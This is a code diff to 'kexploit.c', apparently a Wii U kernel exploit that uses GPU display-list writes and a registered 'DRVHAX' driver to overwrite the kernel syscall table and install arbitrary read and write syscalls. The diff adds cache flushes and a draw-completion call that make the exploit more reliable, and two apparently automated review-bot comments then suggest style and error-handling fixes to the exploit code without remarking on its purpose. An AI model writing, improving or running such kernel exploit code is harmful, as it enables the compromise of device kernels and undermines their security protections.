diff --git a/kexploit.c b/kexploit.c
index c3570ac..eb0b77e 100644
--- a/kexploit.c
+++ b/kexploit.c
@@ -64,8 +64,10 @@ void run_kexploit(uint32_t coreinit_handle){
 /* GX2 functions */
 void (*GX2SetSemaphore)(uint64_t *sem, int32_t action);
 void (*GX2Flush)(void);
+ void (*GX2DrawDone)(void);
 void (*GX2DirectCallDisplayList)(void* arg, uint32_t size);
 OSDynLoad_FindExport(gx2_handle, 0, "GX2SetSemaphore", &GX2SetSemaphore);
+ OSDynLoad_FindExport(gx2_handle, 0, "GX2DrawDone", &GX2DrawDone);
 OSDynLoad_FindExport(gx2_handle, 0, "GX2Flush", &GX2Flush);
 OSDynLoad_FindExport(gx2_handle, 0, "GX2DirectCallDisplayList", &GX2DirectCallDisplayList);
@@ -101,6 +103,7 @@ void run_kexploit(uint32_t coreinit_handle){
 GX2DirectCallDisplayList((void*)pm4, 8 * sizeof(uint32_t)); // increment value of kpaddr by 0x01000000
 GX2Flush();
+ GX2DrawDone();
 MEMFreeToDefaultHeap(pm4);
@@ -108,8 +111,12 @@ void run_kexploit(uint32_t coreinit_handle){
 char drvname[6] = {'D', 'R', 'V', 'H', 'A', 'X'};
 Register(drvname, 6, NULL, NULL);
+ DCFlushRange(metadata, 0x04*0x04);
+
 /* Use DRVHAX to install the read and write syscalls */
 uint32_t syscalls[2] = {KERN_CODE_READ, KERN_CODE_WRITE};
+
+ DCFlushRange(syscalls, 0x04*2);
 /* Modify its save area to point to the kernel syscall table */
 drvhax[0x44/4] = KERN_SYSCALL_TBL_1 + (0x34 * 4);
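Review bot: The new `OSDynLoad_FindExport(gx2_handle, 0, "GX2DrawDone", &GX2DrawDone);` discards the lookup result like its neighbours, so `GX2DrawDone` stays uninitialized if the export is missing and the failure only surfaces as a call through a garbage pointer in the second hunk. A minimal guard keeps the module's style: `if (OSDynLoad_FindExport(gx2_handle, 0, "GX2DrawDone", &GX2DrawDone) != 0) return;` (the return type and failure value of OSDynLoad_FindExport are not visible here, so confirm against the header). The new declaration is also inserted between GX2Flush and GX2DirectCallDisplayList while the lookup is placed before GX2Flush; keeping declaration and lookup order the same makes the pairing easier to audit. run_kexploit begins and ends outside this hunk.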
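Review bot: `DCFlushRange(syscalls, 0x04*2);` hard-codes the byte length of a two-element `uint32_t` array; `DCFlushRange(syscalls, sizeof syscalls);` states the same 8 bytes and follows the array if its size changes. The same applies to `DCFlushRange(metadata, 0x04*0x04);` above it, but `metadata` is declared outside the hunk, so I cannot confirm from here that 16 bytes covers the whole object; if it is an array, `sizeof metadata` is the safer spelling, otherwise a short comment naming what the 16 bytes are would help. run_kexploit begins and ends outside this hunk.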